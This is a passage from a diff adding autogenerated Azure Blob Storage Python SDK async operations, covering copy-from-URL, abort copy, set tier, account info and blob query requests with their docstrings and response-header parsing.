response.headers.get('x-ms-request-server-encrypted')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + create_snapshot.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def start_copy_from_url( # pylint: disable=inconsistent-return-statements + self, + copy_source: str, + timeout: Optional[int] = None, + metadata: Optional[Dict[str, str]] = None, + tier: Optional[Union[str, "_models.AccessTierOptional"]] = None, + rehydrate_priority: Optional[Union[str, "_models.RehydratePriority"]] = None, + request_id_parameter: Optional[str] = None, + blob_tags_string: Optional[str] = None, + seal_blob: Optional[bool] = None, + immutability_policy_expiry: Optional[datetime.datetime] = None, + immutability_policy_mode: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] = None, + legal_hold: Optional[bool] = None, + source_modified_access_conditions: Optional["_models.SourceModifiedAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Start Copy From URL operation copies a blob or an internet resource to a new blob. + + :param copy_source: Specifies the name of the source page blob snapshot. This value is a URL of + up to 2 KB in length that specifies a page blob snapshot. The value should be URL-encoded as it + would appear in a request URI. The source blob must either be public or must be authenticated + via a shared access signature. + :type copy_source: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param tier: Optional. Indicates the tier to be set on the blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.AccessTierOptional + :param rehydrate_priority: Optional: Indicates the priority with which to rehydrate an archived + blob. Default value is None. + :type rehydrate_priority: str or ~azure.storage.blob.models.RehydratePriority + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. + :type blob_tags_string: str + :param seal_blob: Overrides the sealed state of the destination blob. Service version + 2019-12-12 and newer. Default value is None. + :type seal_blob: bool + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. 
+ :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specified if a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + _source_if_tags = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _lease_id = None + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + _source_if_tags = source_modified_access_conditions.source_if_tags + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_start_copy_from_url_request( + url=self._config.url, + version=self._config.version, + copy_source=copy_source, + timeout=timeout, + metadata=metadata, + tier=tier, + rehydrate_priority=rehydrate_priority, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + source_if_tags=_source_if_tags, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + blob_tags_string=blob_tags_string, + seal_blob=seal_blob, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + template_url=self.start_copy_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = 
await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + start_copy_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def copy_from_url( # pylint: disable=inconsistent-return-statements + self, + copy_source: str, + timeout: Optional[int] = None, + metadata: Optional[Dict[str, str]] = None, + tier: Optional[Union[str, "_models.AccessTierOptional"]] = None, + request_id_parameter: Optional[str] = None, + source_content_md5: Optional[bytearray] = None, + blob_tags_string: Optional[str] = None, + immutability_policy_expiry: Optional[datetime.datetime] = None, + immutability_policy_mode: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] = None, + legal_hold: Optional[bool] = None, + copy_source_authorization: Optional[str] = None, + copy_source_tags: Optional[Union[str, "_models.BlobCopySourceTags"]] = None, + source_modified_access_conditions: Optional["_models.SourceModifiedAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + **kwargs: Any + ) -> None: + """The Copy From URL operation copies a blob or an internet resource to a new blob. It will not + return a response until the copy is complete. + + :param copy_source: Specifies the name of the source page blob snapshot. This value is a URL of + up to 2 KB in length that specifies a page blob snapshot. The value should be URL-encoded as it + would appear in a request URI. The source blob must either be public or must be authenticated + via a shared access signature. + :type copy_source: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. 
If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param tier: Optional. Indicates the tier to be set on the blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.AccessTierOptional + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param source_content_md5: Specify the md5 calculated for the range of bytes that must be read + from the copy source. Default value is None. + :type source_content_md5: bytearray + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. + :type blob_tags_string: str + :param immutability_policy_expiry: Specifies the date time when the blob's immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specifies whether a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param copy_source_authorization: Only Bearer type is supported. Credentials should be a valid + OAuth access token to copy source. Default value is None. + :type copy_source_authorization: str + :param copy_source_tags: Optional, default 'replace'. Indicates if source tags should be + copied or replaced with the tags specified by x-ms-tags. Default value is None. + :type copy_source_tags: str or ~azure.storage.blob.models.BlobCopySourceTags + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :keyword x_ms_requires_sync: This header indicates that this is a synchronous Copy Blob From + URL instead of an Asynchronous Copy Blob. Default value is "true". Note that overriding this + default value may result in unsupported behavior. 
+ :paramtype x_ms_requires_sync: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + x_ms_requires_sync = kwargs.pop('x_ms_requires_sync', "true") # type: str + + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _lease_id = None + _encryption_scope = None + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + + request = build_copy_from_url_request( + url=self._config.url, + x_ms_requires_sync=x_ms_requires_sync, + version=self._config.version, + copy_source=copy_source, + timeout=timeout, + metadata=metadata, + tier=tier, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + source_content_md5=source_content_md5, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + copy_source_authorization=copy_source_authorization, + encryption_scope=_encryption_scope, + copy_source_tags=copy_source_tags, + template_url=self.copy_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + 
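# --- Editor's note: illustrative comment, not part of the original patch. ---
# Because x-ms-requires-sync defaults to "true", this call only returns once
# the copy has finished, so the x-ms-copy-status header parsed below should
# read "success" rather than "pending". A minimal sketch, assuming `blob_ops`
# is an instance of this operations class and `src_url` is a public or
# SAS-authenticated source URL (hypothetical names):
#
#     await blob_ops.copy_from_url(copy_source=src_url)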
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + copy_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def abort_copy_from_url( # pylint: disable=inconsistent-return-statements + self, + copy_id: str, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Abort Copy From URL operation aborts a pending Copy From URL operation, and leaves a + destination blob with zero length and full metadata. + + :param copy_id: The copy identifier provided in the x-ms-copy-id header of the original Copy + Blob operation. + :type copy_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword comp: comp. Default value is "copy". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword copy_action_abort_constant: Copy action. Default value is "abort". Note that + overriding this default value may result in unsupported behavior. 
+ :paramtype copy_action_abort_constant: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "copy") # type: str + copy_action_abort_constant = kwargs.pop('copy_action_abort_constant', "abort") # type: str + + _lease_id = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_abort_copy_from_url_request( + url=self._config.url, + comp=comp, + copy_action_abort_constant=copy_action_abort_constant, + version=self._config.version, + copy_id=copy_id, + timeout=timeout, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + template_url=self.abort_copy_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [204]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + abort_copy_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def set_tier( # pylint: disable=inconsistent-return-statements + self, + tier: Union[str, "_models.AccessTierRequired"], + snapshot: Optional[str] = None, + version_id: Optional[str] = None, + timeout: Optional[int] = None, + rehydrate_priority: Optional[Union[str, "_models.RehydratePriority"]] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Set Tier operation sets the tier on a blob. The operation is allowed on a page blob in a + premium storage account and on a block blob in a blob storage account (locally redundant + storage only). A premium page blob's tier determines the allowed size, IOPS, and bandwidth of + the blob. A block blob's tier determines Hot/Cool/Archive storage type. This operation does not + update the blob's ETag. + + :param tier: Indicates the tier to be set on the blob. + :type tier: str or ~azure.storage.blob.models.AccessTierRequired + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. 
Default value is None. + :type snapshot: str + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param rehydrate_priority: Optional: Indicates the priority with which to rehydrate an archived + blob. Default value is None. + :type rehydrate_priority: str or ~azure.storage.blob.models.RehydratePriority + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "tier". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "tier") # type: str + + _lease_id = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_tags = modified_access_conditions.if_tags + + request = build_set_tier_request( + url=self._config.url, + comp=comp, + version=self._config.version, + tier=tier, + snapshot=snapshot, + version_id=version_id, + timeout=timeout, + rehydrate_priority=rehydrate_priority, + request_id_parameter=request_id_parameter, + lease_id=_lease_id, + if_tags=_if_tags, + template_url=self.set_tier.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200, 202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + if response.status_code == 200: + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + + if response.status_code == 202: + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + 
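# --- Editor's note: illustrative comment, not part of the original patch. ---
# Set Tier distinguishes the two success codes handled here: 200 when the new
# tier takes effect immediately, 202 when the request is only accepted, e.g.
# while an archived blob is still rehydrating. A minimal sketch, assuming
# `blob_ops` is an instance of this operations class (hypothetical name):
#
#     await blob_ops.set_tier(tier="Cool")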
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_tier.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def get_account_info( # pylint: disable=inconsistent-return-statements + self, + **kwargs: Any + ) -> None: + """Returns the sku name and account kind. + + :keyword restype: restype. Default value is "account". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "account") # type: str + comp = kwargs.pop('comp', "properties") # type: str + + + request = build_get_account_info_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + template_url=self.get_account_info.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-sku-name']=self._deserialize('str', response.headers.get('x-ms-sku-name')) + response_headers['x-ms-account-kind']=self._deserialize('str', response.headers.get('x-ms-account-kind')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + get_account_info.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def query( + self, + snapshot: Optional[str] = None, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + query_request: Optional["_models.QueryRequest"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> IO: + """The Query operation enables users to select/project on blob data by providing simple query + expressions. 
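        .. admonition:: Editor's note (illustrative addition, not part of the original patch)

            A minimal sketch, assuming ``blob_ops`` is an instance of this
            operations class and using the generated ``QueryRequest`` model
            referenced below (its ``expression`` carries the SQL-like query)::

                request = _models.QueryRequest(expression="SELECT * FROM BlobStorage")
                stream = await blob_ops.query(query_request=request)
                chunks = [chunk async for chunk in stream]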
+ + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param query_request: the query request. Default value is None. + :type query_request: ~azure.storage.blob.models.QueryRequest + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "query". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: IO, or the result of cls(response) + :rtype: IO + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[IO] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "query") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if query_request is not None: + _content = self._serialize.body(query_request, 'QueryRequest', is_xml=True) + else: + _content = None + + request = build_query_request( + url=self._config.url, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + snapshot=snapshot, + timeout=timeout, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.query.metadata['url'], + 
) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=True, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200, 206]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + if response.status_code == 200: + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta')) + response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length')) + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding')) + response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control')) + response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition')) + response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-blob-type']=self._deserialize('str', response.headers.get('x-ms-blob-type')) + response_headers['x-ms-copy-completion-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-copy-completion-time')) + response_headers['x-ms-copy-status-description']=self._deserialize('str', response.headers.get('x-ms-copy-status-description')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-progress']=self._deserialize('str', response.headers.get('x-ms-copy-progress')) + response_headers['x-ms-copy-source']=self._deserialize('str', response.headers.get('x-ms-copy-source')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration')) + response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state')) + response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', 
